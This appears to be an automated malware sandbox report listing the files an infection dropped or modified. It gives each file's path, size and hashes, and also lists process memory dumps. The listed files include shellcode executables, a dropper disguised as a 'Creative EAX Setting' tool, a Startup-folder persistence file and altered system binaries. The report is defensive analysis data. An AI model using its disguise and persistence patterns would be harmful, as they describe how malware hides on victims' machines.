C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

Filesize
2.1MB

MD5
f967543224dfe63058264d5b65d39258

SHA1
7493d0cde536edd9269f122ba07f50c68f362cd8

SHA256
fc21d4269b2b5ea53909d24def9024c9257c452050b891eb32dd6905e23ed78b

SHA512
1be40ef5e1db3c44d8aabbe7a4ea089310d51e9461d3b7615c19092459aae1d9df8517a3b477a6d628bfbe3f3d0df2fe07a6a23a3c98abced7935ef51446dab3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Creative EAX Setting.exe

Filesize
36KB

MD5
b5bcbd79c09c0c112325b5ec0e61c60c

SHA1
d0fa34282a5b26914ab5b78d6a059d3aa85c8f33

SHA256
bbd717a039b73811fe22bd8d4812fddf5e139d2adcb562a0a08ebcf2bf28c3d2

SHA512
b6dfdc540c5d199c33de8874e9464329194e7b1d01b0ba296830ad35fde1d89b252fc33f1b9002f7dc4e31031ad5fd832416cce071090d84899b42e014bc1f33

Download Submit
C:\Users\Admin\AppData\Local\Temp\Creative EAX Setting.exe.config

Filesize
189B

MD5
9dbad5517b46f41dbb0d8780b20ab87e

SHA1
ef6aef0b1ea5d01b6e088a8bf2f429773c04ba5e

SHA256
47e5a0f101af4151d7f13d2d6bfa9b847d5b5e4a98d1f4674b7c015772746cdf

SHA512
43825f5c26c54e1fc5bffcce30caad1449a28c0c9a9432e9ce17d255f8bf6057c1a1002d9471e5b654ab1de08fb6eabf96302cdb3e0fb4b63ba0ff186e903be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll

Filesize
2.1MB

MD5
c3291bc3a34eb26cf50ee2e19160f99f

SHA1
87dbe564d84302fc9d7a5812827a588edc0fecb6

SHA256
7be259b403614c31b75312e938da3c6567b8f4f86d7e72ee4676b9ec9662e5f8

SHA512
58581e398699900ede25ca54f067ffe5b42b364b87b1e1beae073d9d5703f4fd85e4e4b298a8b8831b1eb2c96936cff738cb0520c9e70451ff62b132fe47ec17

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

Filesize
731KB

MD5
851be4e85b0f111883680e87099483a3

SHA1
155e19ad0d2ec4bef3ba25512b6e8bc403350ec9

SHA256
ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197

SHA512
bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4ss.exe

Filesize
35KB

MD5
ed98a49ac4fde926e90a978ff031f71b

SHA1
3a2289fa2b64b373e68df903eae1cf994a1fa26b

SHA256
f62305aad9b69c43ce5dfc7fd98b52385865d347dd0603001720c5314cfb48b1

SHA512
887a4ca191d33a0b9c1dc2dd86ef0a69be85f1d076c77ecb6d685986ec3699e036f2da589a9506da0ae492a3c4101b308cd166d219a013175869a0bfdb6c89cf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4m5tl.exe

Filesize
738KB

MD5
ac07695d166b323937401d45b0fda1f0

SHA1
c89d3012fcf76227801a8bc6866b4b985ee0c50f

SHA256
b4911e00d3c54e7dbaa492695e337b2bc7d1c819c01533b8f547c9db06a650aa

SHA512
37cded2a88d09ee3a89441753c86d766650a34fd7708e021d4941e615e69c9d0e008fc391491e9c51e6e507f3a75d612b969c8e4619ce704b034f53a6d08e387

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

Filesize
603KB

MD5
2028d8df07374028fb90580675380c0c

SHA1
34e3979aa230d58809da42a53fc3241382925aad

SHA256
7bc0be2f52d294a49a791bf3b1b72651e628b3638b60461a3575a049aefa015f

SHA512
fd83d250fc27b2a006b7fae9373190a5e8e1ba21dfdea6f13ddcc62a85d5627c286ac6b39542b4c4c62b3c00a15b263a004e3d51125fc40deb69fe0c711d6a46

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

Filesize
678KB

MD5
40c729ff1c2e454caa0258a3d153da4b

SHA1
1623e1946655086f95758d5e5c6aceb144ec8b82

SHA256
03944e6299539ab0fbb66ee5a9a7aad621517b46496a76a2b5c7ff7e622a001e

SHA512
7701da409ffecd9790db1739b4a34f7992f2d6250ea78e5186ce41ce46458f519fadfa26dfd02dc85e985e18992c66c3c2f1aef9e07544443087092237fcbe0d

Download Submit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

Filesize
656KB

MD5
08c0f9bce8b3b6d0e27ee06aac3e9c26

SHA1
eddc6e9a3764cf12da15fbbfa79fdab27d8bd649

SHA256
7810d780af7cc5d6485f38f38ff12b475b7810202a9433e88bb3e513463ffea1

SHA512
a664ddb4f1119d40f735ffc1f67fce6a77ff19b3f6a8872da315f9d26ebcb4185abe305cd5128d9c6979d08c33dce8f57e8d6d14fec0f6901d4b6d720de302ce

Download Submit
\Windows\System32\alg.exe

Filesize
644KB

MD5
9ce186e71c39265bb9065a7566036b7c

SHA1
825f3c4b8493c7abdc102bc0aaa1544ca8da362e

SHA256
b98c726946171105c6690d631d2173edd82b01e125b92a4fa042fa81dbdda798

SHA512
3541c6146d47c674119a8f276fa4aa96d6dcfb743f355881d4ac1ab57c8ccfe2b97f027d31f6ab5c0bca0ea524dfa028ff990a4df4d32a97dbbf2287f0081848

Download Submit
memory/1076-119-0x0000000000230000-0x0000000000297000-memory.dmp

Filesize
412KB

Download
memory/1076-124-0x0000000000230000-0x0000000000297000-memory.dmp

Filesize
412KB

Download
memory/1076-517-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/1076-127-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/1460-82-0x0000000000270000-0x00000000002D7000-memory.dmp

Filesize
412KB

Download
memory/1460-83-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/1460-514-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/1460-77-0x0000000000270000-0x00000000002D7000-memory.dmp

Filesize
412KB

Download
memory/1644-112-0x00000000001E0000-0x0000000000240000-memory.dmp

Filesize
384KB

Download
memory/1644-114-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/1644-106-0x00000000001E0000-0x0000000000240000-memory.dmp

Filesize
384KB

Download
memory/1644-516-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/1664-144-0x000000002E000000-0x000000002E0B5000-memory.dmp

Filesize
724KB

Download
memory/1664-518-0x000000002E000000-0x000000002E0B5000-memory.dmp

Filesize
724KB

Download
memory/1744-92-0x0000000000220000-0x0000000000280000-memory.dmp

Filesize
384KB

Download
memory/1744-515-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/1744-98-0x0000000000220000-0x0000000000280000-memory.dmp

Filesize
384KB

Download
memory/1744-91-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/1760-268-0x00000000013F0000-0x000000000141A000-memory.dmp

Filesize
168KB

Download
memory/1760-118-0x0000000000970000-0x0000000000978000-memory.dmp

Filesize
32KB

Download
memory/1760-116-0x0000000019F80000-0x000000001A262000-memory.dmp

Filesize
2.9MB

Download
memory/2020-513-0x0000000140000000-0x000000014009D000-memory.dmp

Filesize
628KB

Download
memory/2020-64-0x0000000000A80000-0x0000000000AE0000-memory.dmp

Filesize
384KB

Download
memory/2020-70-0x0000000000A80000-0x0000000000AE0000-memory.dmp

Filesize
384KB

Download
memory/2020-63-0x0000000140000000-0x000000014009D000-memory.dmp

Filesize
628KB

Download
memory/2084-15-0x000000007430E000-0x000000007430F000-memory.dmp

Filesize
4KB

Download
memory/2084-26-0x0000000004FB0000-0x00000000051C6000-memory.dmp

Filesize
2.1MB

Download
memory/2084-22-0x0000000000EC0000-0x0000000000ED0000-memory.dmp

Filesize
64KB

Download
memory/2212-142-0x0000000140000000-0x00000001400CA000-memory.dmp

Filesize
808KB

Download
memory/2212-135-0x0000000000FD0000-0x0000000001030000-memory.dmp

Filesize
384KB

Download
memory/2212-137-0x0000000140000000-0x00000001400CA000-memory.dmp

Filesize
808KB

Download
memory/2212-129-0x0000000000FD0000-0x0000000001030000-memory.dmp

Filesize
384KB

Download
memory/2336-2-0x000000001B010000-0x000000001B19A000-memory.dmp

Filesize
1.5MB

Download
memory/2336-0-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

Filesize
4KB

Download
memory/2336-21-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/2336-1-0x0000000000B50000-0x0000000000CF2000-memory.dmp

Filesize
1.6MB

Download
memory/2336-3-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/2560-44-0x00000000005A0000-0x0000000000607000-memory.dmp

Filesize
412KB

Download
memory/2560-39-0x00000000005A0000-0x0000000000607000-memory.dmp

Filesize
412KB

Download
memory/2560-74-0x0000000000400000-0x00000000004B9000-memory.dmp

Filesize
740KB

Download
memory/2560-38-0x0000000000400000-0x00000000004B9000-memory.dmp

Filesize
740KB

Download
memory/2564-51-0x0000000000C30000-0x0000000000C90000-memory.dmp

Filesize
384KB

Download
memory/2564-50-0x0000000100000000-0x00000001000A4000-memory.dmp

Filesize
656KB

Download
memory/2564-57-0x0000000000C30000-0x0000000000C90000-memory.dmp

Filesize
384KB

Download
memory/2564-512-0x0000000100000000-0x00000001000A4000-memory.dmp

Filesize
656KB

Download
memory/2692-34-0x0000000000FD0000-0x0000000000FE0000-memory.dmp

Filesize
64KB

Download
memory/2716-19-0x0000000001200000-0x00000000012BE000-memory.dmp

Filesize
760KB

Download